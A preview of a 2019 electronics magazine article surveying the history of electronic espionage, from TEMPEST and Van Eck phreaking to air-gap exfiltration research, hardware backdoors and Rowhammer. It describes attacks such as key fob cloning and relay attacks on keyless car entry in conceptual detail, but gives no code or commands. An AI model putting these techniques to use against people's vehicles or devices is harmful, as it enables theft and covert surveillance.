This is only a preview of the September 2019 issue of Silicon Chip. You can view 58 of the 128 pages in the full issue, including the advertisments. For full access, purchase the issue for $10.00 or subscribe for access to the latest issues. Articles in this series:
Items relevant to "Build your own Gamer’s Seat with Four DoF":
Items relevant to "A new Micromite: the sensational Explore-28":
Items relevant to "Six-way Stereo Audio Input Selector with remote control":
Articles in this series:
Items relevant to "Ultrabrite LED Bicycle Light":
Purchase a printed copy of this issue for $10.00. |
A BRIEF HISTORY OF
CYBER ESPIONAGE
AND CYBER WEAPONS
Part 1 – espionage methods over the years – by Dr David Maddison
S
Part 1: pre-existing electronic hardware vulnerabilities and creating vulnerabilities
pying on one’s enemies (or even one’s friends!) or sabotaging infrastructure is one of humanity’s oldest activities, but electronics vastly expanded the possible
ways of doing so.
In this article, we’ll describe some fascinating espionage
methods that can be (and have been) used to take advantage
of hidden flaws in everyday equipment, allowing spies to get
their hands on all sorts of secret information.
Naturally, many such techniques are secret, but there are
still many that have been described in the open literature,
that we explain below.
The variety of technologies and methods of concealment
of electronic espionage is immense, so we can only survey
a portion of those, and give the most interesting examples.
The number of ways people have devised to spy on each
other is seemingly only limited by the imagination.
We’ve come up with so many interesting electronic espionage techniques that this article will concentrate on those
which exploit vulnerabilities in electronics and hardware,
and techniques for creating vulnerabilities which can then
be exploited later.
Next month, we’ll have a follow-up article covering other electronic spying techniques, which we don’t have room
for in this article.
Unintentional “leakage”
Many of the techniques described below can be classified
as a “side-channel attack”.
This involves the unintentional leakage of information
from a system, such as RF or optical emanations from the
16
Silicon Chip
device, which are an unwanted side effect of its regular operation.
We present these in chronological order, to give an idea
of the history of such exploits, which goes back further than
you might imagine. We’ll start with pre-existing hardware
vulnerabilities (side channel attacks).
TEMPEST and teleprinters
During the second world war, it was noticed that the plain
text from encrypted teleprinter communications could be recovered some distance away.
This is because of the significant EMI generated when the
relays within the units switched on and off. Fig.1 shows one
of the affected units, a Bell 131-B2.
To work around this problem, commanders were instructed to maintain a secure zone for 33m around the encryption
device. There were technical fixes put in place to reduce the
EMI leakage, such as adding shielding, power supply filtering (to prevent signals travelling back along supply lines)
and the use of lower-power relays which generated lower
amplitude spikes when switching.
But these efforts were not entirely successful and only reduced the distance over which information could be gathered, rather than eliminating the problem altogether.
Another problem was that while reduced power operation reduced leakage, it also limited how far apart the connected equipment could be, or how many teleprinters could
be driven at once.
The problem wasn’t just limited to teleprinters, either.
Signals from some electronic typewriters in use after WWII,
Australia’s electronics magazine
siliconchip.com.au
Fig.2: the commercially-available Orion 2.4
HX Non-Linear Junction Detector.
Fig.1(left) : a Bell 131B2 mixer, which
was used to encrypt or decrypt
teleprinter signals using relay logic.
Its electronic emissions could be
picked up some distance away.
including in embassies and other secure locations, could be
picked up and decoded from as far away as 1km!
Due to the scope of this problem, in the early 1960s, the
USA produced a set of guidelines under the codename TEMPEST, intended to prevent enemies from gaining access to
classified information due to these types of emissions.
In some locations, such as the US embassy in Moscow,
equipment was installed in Faraday cages to significantly
reduce electronic emissions. Apparently, staff did not like
working inside them and referred to them as “meat lockers”.
For more information, see the Wikipedia article on TEMPEST at: siliconchip.com.au/link/aaqp
Interestingly, many of the TEMPEST guidelines are still
applicable today, and some of the attacks described below
would not be possible if the vulnerable systems complied
with those standards.
Non-linear junction detectors
A non-linear junction detector is a device which was
once used to find bugs (Fig.2). These work even if the bug
is powered off. It uses the principle that a non-linear junction such as a p-n junction, as found in a transistor or diode, gives a characteristic response when illuminated with
radio-frequency energy.
This allows out-of-place electronic devices to be detected,
eg, those hidden in walls or decorations.
Such detectors can be easily defeated, however, by a loadmatching device called an isolator, and the US CIA has done
so with their listening devices since 1968.
Black Crow
In 1970, during the Vietnam war, a phased-array antenna
system called Black Crow (AN/ASD-5) was fitted to C-130
Spectre gunships (cargo aircraft modified for ground attack
duties). This could detect the electromagnetic emissions of
vehicle ignition systems up to 16km away (see Figs.3 & 4).
This system was initially designed for picking up submerged submarines, as a form of Magnetic Anomaly Detector, but some bright spark (no pun intended) realised that
it could also be used by aircraft to pick up the emissions
Fig.3 (left): a Vietnam War-era AC-130A “Spectre” gunship, one of the types outfitted with the Black Crow system. Note the
side-facing radome near the front of the aircraft, along with the barrels of multiple cannons aimed in the same direction.
Fig.4 (right): the sensor operator station in a modern AC-130 aircraft, using cameras, radars and other equipment to locate
enemy targets.
siliconchip.com.au
Australia’s electronics magazine
September 2019 17
Fig.5: an image recovered from the LCD screen of a
440CDX laptop 10m away, through three plasterboard
walls (M.G. Kuhn, University of Cambridge Computer
Laboratory, 2004). The image is not perfect but is certainly
readable.
from the ignition systems of enemy trucks travelling along
the Ho Chi Minh trail, much of which was obscured by jungle.
Once detected by the system, there was no need to spot
the trucks visually for engagement; the output of the Black
Crow system was able to control the gunship targeting computers directly, to aim cannons at vehicles even though they
could not be seen through the dense jungle canopy.
It could also pick up radio transmitters on the ground,
such as those used by Forward Air Controllers, who relay
targeting information to aircraft.
CRT and LCD monitors (RF emissions)
While CRT monitors are rarely used today, in 1985, Dutch
researcher Wim van Eck demonstrated in open literature that
simple and cheap equipment could be used to reproduce
images from remote computer monitors.
This was done by picking up their RF emissions, an activity then thought to be restricted to major government espionage operations.
The technique came to be known as “Van Eck phreaking”.
It can also be applied to LCD monitors, including those used
in laptop computers – see Fig.5. You can read the original
paper at: siliconchip.com.au/link/aaqq
Today, Van Eck phreaking can be done with cheap software-defined radios (SDRs) with appropriate software, such
as Martin Marinov’s TempestSDR – see Fig.6.
If you want to try this, we suggest you test it on your
own computers, as using such software without the target’s
permission or knowledge is likely to be illegal and could
get you in trouble.
For more information on TempestSDR, see the video titled
“TempestSDR - Remotely Eavesdropping on Monitors via Unintentionally Radiated RF” at: siliconchip.com.au/link/aaqr
TV licence vans (UK)
Some regard them as a hoax, but the information above
about Van Eck Phreaking, and the fact that radar detector
detectors exist (note, that is not a misprint!), suggests that it
may be possible for vans to drive around and detect nearby
operating CRT television sets.
However, the number of prosecutions achieved for op18
Silicon Chip
Fig.6: a screen grab of the TempestSDR software receiving
a checkerboard pattern from a remote computer
(background). In the foreground window, part of the
received image is shown, along with some signal spectra.
erating a TV without a license in the UK was quite small.
Blinking lights
In 2002, it was discovered by researchers J. Loughry and
David Umphress that the LED status lights of modems and
other data communications equipment could reveal the data
being carried by the device. No installation of malware on
connected computers was required to take advantage of
this, and the authors suggested design changes to prevent
such data leakage.
This was found to even be possible with lights observed
from afar with a telescope.
Decoding diffuse reflections from monitors
Also in 2002, M. Kuhn at the University of Cambridge
demonstrated the reconstruction of an image from a CRT
monitor screen, using only the diffuse reflection from objects such as a wall or furniture.
This was shown to be possible even through curtains,
blinds or frosted glass.
It was determined that the contents of a CRT screen, even
with small fonts, could be established by the use of a 300mm
astronomical telescope from 60m away, observing the CRT
reflection from an object.
Having acquired the image data, mathematical image
processing was used to recover the image from the screen
– see Figs.7 & 8.
This technique is known as “optical time-domain eavesdropping”. It takes advantage of the fact that although a CRT
screen appears to have a steady image, only a tiny portion
of the screen is actually illuminated at any given time, and
the ‘persistence of vision’ of our eyes causes the illusion of
an image covering the whole screen.
So a simple light sensor can be used to pick up the changes in brightness off diffuse objects on a short time scale.
It is then possible to determine the horizontal and vertical
blanking intervals based on breaks in that illumination, to
simulate the movement of the beam across the CRT screen,
then apply the same brightness variations to reconstruct that
image without needing to observe it.
While modern LCD and OLED screens are updated in a
Australia’s electronics magazine
siliconchip.com.au
Fig.7: a test image, displayed on a monitor which was not
directly observable (eg, facing a wall, with the observer
able to see the wall but not the monitor).
Fig.8: the image recovered after applying mathematical
techniques to the diffuse reflection from the wall. Again, it’s
not perfect but is largely legible.
similar scanning manner to a CRT, because the image on the
screen is steady, this technique is unlikely to work.
network to recognise keypresses on a keyboard.
The resulting accuracy was as good as one incorrect guess
per 40 keystrokes, and the method worked at distances of
up to 15m.
Cloning key fobs
In 2008, it was demonstrated that the
KeeLoq proprietary code-hopping
cipher used in many garage and car
door opening systems could be
compromised.
The cryptographic keys used
by a particular manufacturer
could be recovered by measuring the power consumption of a device (in
possession) such as a key fob during the encryption process.
Once the cipher for a specific manufacturer is recovered,
it is then possible to intercept two transmissions from a target key fob from as far away as 100m, and the device can
be cloned. Furthermore, it is then possible to lock out the
legitimate user of the cloned device.
Some keyfobs, including older ones used for opening cars
and garage doors, can be cloned without resorting to such
clever tactics. Those which do not use rolling codes, just
a basic handshake, are subject to a simple ‘replay attack’.
In this case, recording and replaying their RF emissions
may be enough to gain access. This has been demonstrated
using an SDR (software-defined radio).
Breaking systems that use a weak rolling code requires a
bit more refinement (but not much); with many such systems, recording the RF associated with two subsequent access attempts (or possibly even just one) can be enough to
establish the code being used and allow the attacker to later
produce the next code in the sequence, opening the door.
The NSA ANT Catalog
The NSA ANT Catalog is like a mail-order catalog of
electronic espionage equipment available from the US National Security Agency. ANT is their Advanced Network
Technology division. It was produced in 2008 and reflects
Leaking acoustic and electromagnetic
radiation from keyboards
Computer keyboards can leak RF radiation which can be
used to decode what is being typed on them. In 2008, researchers Vuagnoux and Pasini (and many before) demonstrated the successful reading of multiple keyboard types
including PS/2, USB, wireless and laptop boards, with 95%
recovery of keystrokes up to 20m away, and even through
walls.
Acoustic emanations from keyboards can also be used to
decode what is being typed, due to imperceptible differences
in the sounds of individual keystrokes. In 2004, researchers Asonov and Agrawal used this method to train a neural
siliconchip.com.au
Fig.9: just one of the dozens of pages from the NSA ANT
Catalog, which lists the electronic espionage tools available
to friendly government agencies. This page shows a tiny
device which can be hidden in a computer monitor cable,
allowing the screen contents to be remotely read when
illuminated by a radar.
Australia’s electronics magazine
September 2019 19
Fig.10: researchers demonstrated the ability to read text off a smartphone screen from reflections off a variety of objects,
including the user’s eyeballs!
items available to the NSA, US citizens and the Five Eyes
intelligence alliance (which includes Australia). A sample
page is shown in Fig.9.
It was released to the public by the German magazine
Der Spiegel from an unknown source in 2013. A copy of
the catalog can be seen here: siliconchip.com.au/link/aaqs
Most of the devices involve exploits against networked
computer systems or mobile phones, and many are targeted
toward the equipment of specific manufacturers.
Highlights from the catalog include:
• COTTONMOUTH, a USB “hardware implant” that provides
a wireless bridge into a target network with the ability
to load software on target PCs
• NIGHTSTAND, which exploits weaknesses of the wireless 802.11 protocol to access wireless networks from
as far away as 13km
Remote observation of vibrating objects to
recover audio
This technique, developed by researchers at the Massachusetts Institute of Technology (MIT), is known as “passive
recovery of sound from video” or the “visual microphone”.
It involves visual observation of an object in a room under surveillance, and recovery of audio (including speech)
from vibrations of that object, caused by sound in the room
(see Fig.11).
Objects that this technique has shown to be successfully
used with include a chip packet, aluminium foil, the surface of a container of water and plant leaves.
These observations were made with a high-speed video
camera at 2000-6000 frames per second (FPS), but effective
• SURLYSPAWN, a device to provide a signal return encoded with information from low data rate devices such
as keyboards when illuminated with radar
• GOPHERSET, a software implant for GSM phone SIM
cards which sends phone book, SMS and call logs from
a target phone to a user-defined phone number via SMS
Reflections from eyeballs, sunglasses etc
In 2013, researchers Yi Xu et al demonstrated how text
on a smartphone screen could be read by observing screen
reflections on objects such as 1) sunglasses and a toaster, 2)
via reflection from eyeball, 3) reflection from sunglasses, 4)
viewing from a long distance, plus they could decode typed
words using finger motion analysis – see Fig.10.
You can see some videos on this subject, and original
publication, at: siliconchip.com.au/link/aaqt
20
Silicon Chip
Fig.11: “the visual microphone”; recovery of audio from
video observation of a chip packet. In this case, the audio
being recovered is a pure tone rendition of “Mary had a
Little Lamb”.
Australia’s electronics magazine
siliconchip.com.au
results were also obtained with a consumer-grade digital
SLR (DSLR) camera operating at 60 FPS.
Even though the vibrations are not visible to the naked
eye, sub-pixel variations representing soundwaves can be
extracted with appropriate data processing.
Observations were performed at a distance of up to four
metres, but longer distances are thought to be possible with
appropriate optics.
For more information, see the video titled “The Visual
Microphone: Passive Recovery of Sound from Video” at:
siliconchip.com.au/link/aaqu
Remote mobile phone microphone activation
In surveillance terminology, a “roving bug” or “hot mic”
(microphone) refers to the microphone in a mobile phone
which has been activated as a listening device, whether a
phone call is in progress or not, or even if the phone appears to be turned off.
This technique is employed by intelligence agencies using
a variety of methods, including the use of a suite of smartphone hacking tools known as “Smurf Suite” for Android
and iPhone devices. This was developed by the US NSA,
as revealed by The Guardian newspaper in January 2014.
It’s possible to listen to the microphone on a phone that is
apparently turned off because some phones still have some
circuitry running even when off, and they can only be truly deactivated by removing the battery. See the video titled
“Edward Snowden: ‘Smartphones can be taken over’ - BBC
News” at: siliconchip.com.au/link/aaqv
Encryption key recovery using PITA
In 2015, researchers from the Laboratory for Experimental
Information Security at Tel Aviv University in Israel made
a demonstration at a cryptographic conference, to show the
vulnerability of computer systems to RF sniffing.
They called their invention PITA, which stands for Portable Instrument for Trace Acquisition.
They non-invasively recovered cryptographic keys from a
laptop 50cm away in only a few seconds, by picking up its RF
emissions with cheap and readily-available equipment, including an SDR (software defined radio) dongle – see Fig.12.
They alerted GnuPG, the open source organisation that
supplies the widely used encryption software called PGP
(“pretty good privacy”; not “great privacy”, apparently),
which was the subject of the demonstrated attack. This
software was subsequently modified to prevent this attack,
although other cryptographic systems could be vulnerable
to similar schemes.
For more details on PITA, see: siliconchip.com.au/link/
aaqw
Spying on vehicle occupants
Many modern cars have computer systems that connect
to their manufacturers via a mobile phone network, to report performance parameters, upgrade software or for emergency assistance.
As an example, in the United States, GM’s OnStar technology (siliconchip.com.au/link/aaqx) can activate an in-car
microphone to see if the occupants need help after a crash.
It can also be used to remotely unlock a car if the keys have
been locked inside.
If the car has been stolen, this microphone can also be
used to assist the police in arresting the perpetrators.
siliconchip.com.au
Fig.12: the PITA device (Portable Instrument for Trace
Acquisition), shown on top of a possible disguise for the
device.
The US FBI (Federal Bureau of Investigation) and other agencies realised that this could also be used to spy on
people; however, a 2003 court ruling established that they
were not allowed to do so. In 2015, a hacker demonstrated
they could remotely locate, unlock and start a vehicle, but
the company modified the system to prevent this happening in future.
Mobile phone tracking
Mobile phones users can be tracked by methods including:
1) With the cooperation of the service provider, it is possible to determine which base station a handset is closest to
and the adjacent ones and, with knowledge of the power
levels and antenna patterns, a location fix to within about
50m can be obtained in urban areas.
2) A handset can broadcast its location, determined either
by a GPS receiver or by knowledge of signal strengths and
triangulation from nearby towers.
3) The location of a handset can be established by nearby
WiFi networks. The phone requires software to do this,
which is widely available.
4) Specific Apps on the phone can send one’s location to others (eg, one called Life360). This can be useful for knowing when family members will get home or coordinating
meetings, but of course, there is also the possibility that
malicious Apps could do the same.
It is also possible to use these location methods to find an
injured person, as happened recently in Australia, where a
car ran off the side of the road and the driver did not know
where they were. They rang emergency services using a
mobile phone, who were then able to use the phone to locate them.
Note that almost all telecommunications and Internet
activity is recorded by or for the government in Australia,
most recently under the Telecommunications (Interception
and Access) Amendment (Data Retention) Act 2015. For details on this, see the following web page: siliconchip.com.
au/link/aaqy
The author recalls how the introduction of the GSM network in Australia, finally activated in 1993, was significantly
delayed until Australian Government agencies were given
the means to access communications going through that network (this was widely reported at the time).
Signal Amplification Relay Attack (SARA)
This attack works against anything with proximity key-
Australia’s electronics magazine
September 2019 21
tenna can be used for picking up higher frequency signals.
This attack only works for certain cars (but there are millions of them on the road), and it requires another SARA
attack to start the engine or reprogram the vehicle to accept
a new key. It is suggested that criminals don’t need to start
the car a second time, as they drive to a location and strip
the car or use it once for a crime like a bank robbery etc.
Other forms of “relay” attack work similarly.
Many vehicle thefts have been documented which are either known to or appear to have used a SARA attack, including many expensive cars. See the video titled “Car Theft:
Key Fob Relay Hack Attack Explained” at: siliconchip.
com.au/link/aaqz
Fig.13: a simplified scheme of the SARA relay attack.
Source: Francillon, Danev and Capkun, Department
of Computer Science, ETH Zurich.
less entry, such as many modern cars, and some building
entrances or garage doors. It does not require possession of a
key, just a knowledge of its approximate location. It works
by making a long-range connection between a legitimate
owner’s key fob and the point to be accessed – see Fig.13.
This attack primarily works on systems that do not require a button on the key/card to be pressed to gain access,
but rather, simply require its proximity to the lock or a button press on the lock itself. This is because systems where
a button is pressed on the key require access to the key.
Many cars use a system known as Passive Keyless Entry and Start (PKES), although others are also used. The
principle involved is that when the keyfob and vehicle are
near to each other, an RF handshake occurs between the
two devices. This handshake is encrypted and uses a rolling code, so just recording the exchange between the two
devices will not allow you to gain access later.
However, SARA emulates the key possessor being near
the vehicle or door, when in fact they are far away (say,
100m). This allows the attackers to unlock the door without having the key.
A simplified explanation of how PKES works is as follows. The car or other access point regularly emits a low
frequency (LF) probe signal of 120-135kHz, which is picked
up by the key’s paired RFID chip when it is less than 2m
away. This then activates a microcontroller in the key,
which opens a UHF channel and completes a rolling code
authentication with the vehicle.
The doors can be opened or, if the key is detected as being
inside the vehicle, the engine can be started. Other systems
may have the key respond on an LF band rather than UHF.
A PKES attack first requires two devices, one near the
car, the other within range of the keyfob. A long-range communications channel is then established between the two.
The device near the car captures its LF emission and converts it to a convenient frequency, such as 2.5GHz. This
is then received by the device near the keyfob and downconverted back to the original LF frequency.
The key fob then reacts in the usual manner, and its UHF
transmissions are picked up and relayed back to the other
unit, and the rolling code exchange can be completed over
the relay channel, as if the key is close to the vehicle. A loop
antenna is used at both locations to inject and receive the
LF signals from the car and key, while a standard UHF an22
Silicon Chip
CREATING VULNERABILITIES
IN HARDWARE
IBM Selectric typewriter keystroke logging
In 1984, it was discovered that from 1976-1984, 16 IBM
Selectric typewriters used in the US Embassy in Moscow
and the US Consulate in Leningrad had been fitted with
what would today be called a key-logging system.
These typewriters were electromechanical, with no electronics, so this was not a traditional form of hacking (see
Fig.14).
The attack was highly sophisticated and much more
complex than the Soviets were thought to be capable of.
The possibility that the typewriters might be bugged was
only established after the French discovered one of their
teleprinters had been bugged, and alerted the Americans,
which lead to the “GUNMAN Project” to find these and
other bugs.
These typewriters used mechanical binary coding to
move the ‘golf ball’ print head. The position of the six
“latch interposers” on the typewriter had been modified,
and a magnet added.
The bug had magnetometers that could sense the position of the latch interposers, which had encoded on them
a 6-bit binary value which the bug compressed to four bits
and then transmitted (Fig.15).
The bugs had special circuitry to evade standard bug
sweeps, such as with non-linear junction detectors. It is
likely enemy agents had obtained access to the typewriter somewhere along the supply chain to install the bugs
(see Fig.16).
The operation of the bug is quite complicated and there
Fig.14: the IBM
Selectric electric
typewriter from
the 1960s, showing
its unique ‘golf
ball’ print head.
The “bugging” of
these was the first
known instance
of key-logging
for espionage. It
used mechanical
binary coding and
mechanical digitalto-analog converters
to detect the
character on the golf ball being typed, then transmitted this
information to a remote location.
Australia’s electronics magazine
siliconchip.com.au
Fig.15: this shows how the Selectric bug worked,
including conversion of the mechanical 6-bit
binary code to a 4-bit value
for transmission.
Image source: Crypto Museum
(www.cryptomuseum.com)
is insufficient space for a full description here. See the following website
for the only detailed description of
its operation on the web: siliconchip.
com.au/link/aare
The full fascinating story can be
read in the declassified document
“Learning from the Enemy: The
GUNMAN Project”, United States
Cryptologic History, Series VI, Vol.
13 at: siliconchip.com.au/link/aaqo
Jumping the “Air Gap”
Computers which require very
high security are protected by an “air gap”, which basically
means that the only wires running to and from those computers carry power; there is no network connection to prevent hackers from accessing the systems or getting data out.
Usually, people with access to air-gapped computers are
also subject to strict rules about carrying USB drives, optical media, smartphones and so on, to prevent a bad actor
from stealing the data.
But Israeli researchers at the Cyber-Security Research
Center at the Ben-Gurion University of the Negev have
devised methods by which data can be extracted from an
air-gapped computer. See the video titled “The Air-Gap
Jumpers” at: siliconchip.com.au/link/aar0
Generally, these methods require the computer to be
compromised in some manner beforehand, possibly before
it is even installed, or via malware on a USB drive smuggled in. Data can then be transmitted to remote locations,
despite the lack of networking.
* LED-it-GO: a computer’s hard drive activity light can
be made to blink on and off in a Morse Code-like pattern.
See the video titled “LED-it-GO. Jumping the Air-Gap with
a small HardDrive LED” at: siliconchip.com.au/link/aar1
* PowerHammer: a method by which the power consumption of the computer is altered by varying CPU utilisation. The variations encode the desired data. Power
consumption can be monitored via associated wall power
outlets and data extracted at the rate of 1000 bits/second,
or by measuring phase angle changes at the electrical junction box, at 10 bits/second.
* MOSQUITO: malware on the target computer transmits data via its speaker to the other computer at 18-24kHz,
which is not audible to most people. A second computer,
up to 9m away, uses its onboard speaker as a microphone
to pick up that signal. See the video titled “MOSQUITO:
Jump air-gaps via speaker-to-speaker communication” at:
siliconchip.com.au/link/aar2
* ODINI: this attack allows data to be extracted from a
computer even when it is in a Faraday cage, which blocks
most electromagnetic radiation.
The exploit is based on the fact that only higher frequency radiation is blocked by the cage, not low frequency or
static magnetic fields. (For example, a compass will still
siliconchip.com.au
work in a Faraday cage.)
Malware on the target computer is used to generate slowly varying magnetic fields by regulating the CPU load. A
sensor external to the Faraday cage can detect the magnetic field variations and receive the desired data. See the
video titled “ODINI: Escaping data from Faraday-caged
Air-Gapped computers” at: siliconchip.com.au/link/aar3
* MAGNETO: similar to ODINI but uses the magnetic
sensor of a smartphone for the receiver. See the video titled
“MAGNETO: Air-Gap Magnetic Keylogger” at: siliconchip.
com.au/link/aar4
* AirHopper: uses malware to generate encoded FM
radio signals via a computer monitor, to be received by a
smartphone. See the video titled “How to leak sensitive
data from an isolated computer (air-gap) to a nearby mobile phone – AirHopper” at: siliconchip.com.au/link/aar5
* BitWhisper: malware which varies the heat output of
the target computer, which can be picked up 40cm away.
Allows the extraction of data such as passwords at the rate
of 1-8 bits per hour.
Fig.16: modified power switches from Selectric typewriters,
showing how power was diverted to run the bug. There
were multiple generations of the bug, and this modification
was not used in all of them. Some of the bugs were battery
powered instead.
Australia’s electronics magazine
September 2019 23
Fig.17: part of the OR1200
CPU (left) showing the tiny
altered region involved in the
A2 malicious hardware attack.
One μm is one-thousandth of a
millimetre.
See the video titled “BitWhisper - Jumping the Air-Gap with
Heat” at: siliconchip.com.au/
link/aar6
* GSMem: malware which
generates radio signals via specific memory instructions, which
can be received by a mobile
phone. See the video titled “GSMem Breaking The Air-Gap” at:
siliconchip.com.au/link/aar7
* DiskFiltration: malware generates ultrasonic audio signals via
the hard disk actuator arm, so it can be used on computers
without speakers. See the video titled “DiskFiltration: Data
Exfiltration from Air-Gapped Computers” at: siliconchip.
com.au/link/aar8
* USBee: utilises malware and an unmodified USB device to generate encoded radio signals that can be received
and decoded using GNU Radio (opens source software radio). See the video titled “USBee: Jumping the air-gap with
USB” at: siliconchip.com.au/link/aar9
* Fansmitter: malware which can transmit acoustic data
from a speakerless computer via modulation of cooling fan
speed, which can be received up to 8m away at a rate of
900 bits per hour. See the video titled “Fansmitter: Leaking Data from Air-Gap Computers (clip #1)” at: siliconchip.
com.au/link/aara
* aIR-Jumper is an optical and infrared exploit using malware to control the infrared illuminators of security cameras
on the same network, allowing bidirectional communication
over distances of kilometres; see the video titled “leaking
data via security cameras” at: siliconchip.com.au/link/aarb
* xLED: malware which extracts information by observing encoded data sent via the LED status lights of a network router. It can be observed remotely using a telescope,
at 1-2000 bits per second. See the video titled “xLED: Covert Data Exfiltration via Router LEDs” at: siliconchip.com.
au/link/aarc
* VisiSploit: malware which encodes data on the computer’s LCD screen in a way not perceptible to humans (eg, fast
flickering), but which can be recovered by viewing the LCD
with a remote or hidden camera (“Optical air-gap exfiltration
attack via invisible images” is another similar technique).
* LCD TEMPEST: malware which encodes data as radio
signals generated by the computer’s video cable, which can
then be received via GNU Radio at 60-640 bits per second.
ers called A2, was shown to work because typically, chip
designers do not have full control over their design. Once
a CPU or other chip is designed, it is sent to a third party
for manufacturing.
The chip development company ensures their design has
not been tampered with by testing the fabricated chips, to
ensure they behave as intended.
But in this particular attack, the malicious circuitry was
only activated by an extremely unusual sequence of events
repeated multiple times, that the original designer could
not possibly envisage or test for.
In the scenario tested by researchers K. Yang, et al, they
modified the circuit by adding capacitors into the chip circuitry or “mask” which siphoned off power from nearby
wires as they transitioned from one logic state to another.
But this only occurred during the execution of an unusual
operation, which could easily be triggered by the attackers.
When those capacitors eventually gain full charge, they
cause a transition of the state of a selected flip-flop that holds
the ‘privilege bit’ for the processor, enabling full control of
the computer by any user.
The attack was tested on an open-source chip design
(OpenRISC 1200 CPU – see Fig.17) but could be adapted
to virtually any CPU.
Because this sort of attack is possible, companies with
suspect behaviour have been banned or restricted from certain activities by governments.
For example, Chinese manufacturers Huawei and ZTE
have been banned in Australia from involvement in the 5G
Manufactured devices with design altered for
espionage
Installing malware or hardware exploits into computer systems is bad enough, but consider that a “backdoor”
could be built into a CPU or other important chip like a
GPU (graphics processing unit). It would be virtually undetectable.
This exact scenario was tested at researchers at the University of Michigan in 2016. This attack, which the research24
Silicon Chip
Fig.18: the announcement that Huawei and ZTE have
been banned by the Federal Government from providing
5G technology in Australia.
Australia’s electronics magazine
siliconchip.com.au
Fig.19: the claimed Chinese espionage chip
supposedly found built into Supermicro
motherboards, along with pencil for size
comparison. It is now doubtful that such a
chip actually exists, but such an attack is
theoretically possible.
network due to security concerns (Fig.18).
The Federal Government has a general
guideline that says there is too much risk
using companies that are “likely to be
subject to extrajudicial directions from
a foreign government that conflict with
Australian law”; see: siliconchip.com.
au/link/aard
The concern is that there might be pressure from the Chinese government for these companies to install backdoors
into the equipment, which could later be used for espionage
(eg, listening to ministers’ private conversations). The government has made no direct public statement advising of
the ban, but the affected companies were informed.
Huawei has also been in the news recently as being
banned from doing business with the United States over
similar concerns.
Huawei and ZTE were also investigated by the US House
Intelligence Committee in 2012 over concerns that their
equipment might be sending intelligence back to the Chinese government.
The Committee recommended that US companies should
not purchase telecommunications equipment from either
company as a result.
ZTE eventually had US their restrictions on US trade relaxed in exchange for paying a US$1 billion fine, as well
as a nearly complete management change, and overwatch
from a US compliance team.
Currently, the only restriction placed on ZTE by the USA
is that their devices will not be considered in US government purchasing contracts.
The ZTE trading ban was in retaliation for selling their
products to Iran and North Korea but ZTE is and was a lot
more dependent on US manufacturers for chips than Huawei. Thus, the damage to ZTE was greater and they were
therefore more keen to have that ban lifted.
See: siliconchip.com.au/link/aaso and siliconchip.com.
au/link/aasp
Equipment intercepted and altered before
delivery
In 2002, the Chinese claimed that a Boeing 767 purchased
from the United States to serve the Chinese President Jiang
Zemin yielded a total of 27 bugs, which they claimed had
been planted by the CIA when the aircraft was undergoing
conversion work to a VIP aircraft in Texas.
As with the 767 incident, other devices can be intercepted
and altered for espionage purposes at some point between
manufacture and delivery of the item to the end user.
In late 2018, there was a claim by Bloomberg News that
US computer server manufacturer Supermicro had been
compromised by the manufacturer in China, by the insertion of a tiny espionage chip that could enable the transmission of data on the computer or its network to malicious
actors (see Fig.19).
This claim has since been thoroughly investigated and
is now widely believed to be untrue. Investigations were
siliconchip.com.au
conducted by companies including Apple and Amazon,
who were Supermicro customers, and the US Department
of Homeland Security and the UK’s National Cyber Security Centre.
Supermicro’s reputation has still damaged though, and
they note the difficulty of proving a negative (ie, that the
malicious chips don’t exist). But that does not mean that
this particular method is impossible.
NSA Cisco router hacks
Security documents and photos were leaked depicting
a US NSA “upgrade” facility called TAO (Tailored Access
Operations) for Cisco devices and other tech devices.
It was claimed the NSA would intercept shipped devices and used this facility to install backdoors or similar exploits, before delivering the products to the end users, who
were presumably unaware that the product(s) had been altered. See: siliconchip.com.au/link/aasq and siliconchip.
com.au/link/aasr
Rowhammer and RAMbleed
Rowhammer is an exploit involving DRAM memory, in
which the memory cells inadvertently leak electrical charge
into adjacent cells, thus causing those cells to change their
contents.
This leakage effect rarely or never occurs in DDR or DDR2
type SDRAM modules, but is known to occur in some
DDR3 and DDR4 modules because of their much higher
chip density.
Normal leakage of the electrical charge representing a
memory state is usually compensated for by regularly rereading the memory element and then rewriting the data.
This is called ‘refreshing’ and is normally done every 64ms.
But with Rowhammer, there is a forced repeated reading
and refreshing of memory elements, with use of the Cache
Line Flush (CLFUSH) instruction causing adjacent memory elements to flip. This is normally prevented by caching
limits, but these limits are overridden by CFLUSH.
The deliberate altering of data in adjacent memory rows
has been used as a basis for the attacker to gain extra access
privileges in the system under attack such as by altering
control structures in memory. In one implementation of a
Rowhammer attack, sensitive data such as passwords can
be extracted from the leaking memory cells.
Rowhammer cannot be easily fixed with security software or operating system updates, and perhaps not at all.
The RAMbleed attack uses Rowhammer to identify bits
that can easily be flipped, even when ECC (error-correcting
code memory) is used. These flippable bits are used to read
out the desired memory contents.
A researcher who discovered this vulnerability, Yuval
Yarom (University of Adelaide) described RAMBleed as
“a side-channel attack that enables an attacker to read out
physical memory belonging to other processes”.
RAMbleed can be theoretically used to read any data in
physical memory. A read rate of 3-4 bits per second has
been demonstrated. Therefore, data such as passwords or
encryption keys can be read in a relatively short time if the
location of the data in memory is known.
SC
Next month, as promised in the intro, we’ll have the
details on many more electronic spying techniques, especially bugging and covert surveillance.
Australia’s electronics magazine
September 2019 25
|